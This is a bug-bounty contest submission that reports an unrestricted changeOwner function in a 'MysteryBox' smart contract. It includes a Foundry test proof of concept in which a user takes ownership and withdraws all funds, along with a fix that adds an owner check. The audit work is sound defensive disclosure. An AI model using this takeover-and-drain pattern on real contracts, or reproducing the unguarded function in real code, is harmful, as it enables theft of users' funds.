Mystery Box

First Flight #25

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

[H-1] Unrestricted changeOwner Function (Insecure Access Control + Ownership Privilege Abuse)

player

Description: The smart contract mysterybox contains a function named changeOwner that allows any user to modify the contract's ownership. This lack of proper access control allows unauthorized users to assume ownership of the contract, giving them full control over its operations. Once a malicious actor gains ownership, they can potentially execute privileged functions, including withdrawing all funds using withdrawFunds function or changing core logic, leading to significant financial and operational damage.

Impact:

Unauthorized Access: Any user can become the contract owner without restriction.
Fund Theft: The new unauthorized owner can withdraw all funds from the contract.
Contract Control: The malicious owner can execute privileged actions, modify the contract.

Proof of Concept:
paste this code snipped inside TestMysteryBox.t.sol and run this command in the terminal forge test --mt testOwnerChange -vvvv to see the full output of this test

function testOwnerChange() public{

// 2 users buys box

vm.deal(user1,5 ether);

vm.prank(user1);

mysteryBox.buyBox{value:0.1 ether}();

vm.deal(user2,2 ether);

vm.prank(user2);

mysteryBox.buyBox{value:0.1 ether}();

//One of the users calls the change owner function and becomes the owner

vm.prank(user1);

mysteryBox.changeOwner(user1);

assertEq(mysteryBox.owner(), user1);

//The current owner withdraws all the funds

uint256 ownerBalanceBefore = user1.balance;

console.log("Owner Balance Before:", ownerBalanceBefore);

vm.prank(user1);

mysteryBox.withdrawFunds();

uint256 ownerBalanceAfter = user1.balance;

console.log("Owner Balance After:", ownerBalanceAfter);

}

Recommended Mitigation:

Implement strict access control on the changeOwner function by adding a require statement to ensure that only the current owner can call this function.

function changeOwner(address _newOwner) public {

+ require(msg.sender == owner);

owner = _newOwner;

}

Consider using OpenZeppelin’s Ownable contract, which provides a secure ownership mechanism.

Tools Used: Manual

Updates

Appeal created

inallhonesty Lead Judge about 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

Anyone can change owner

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!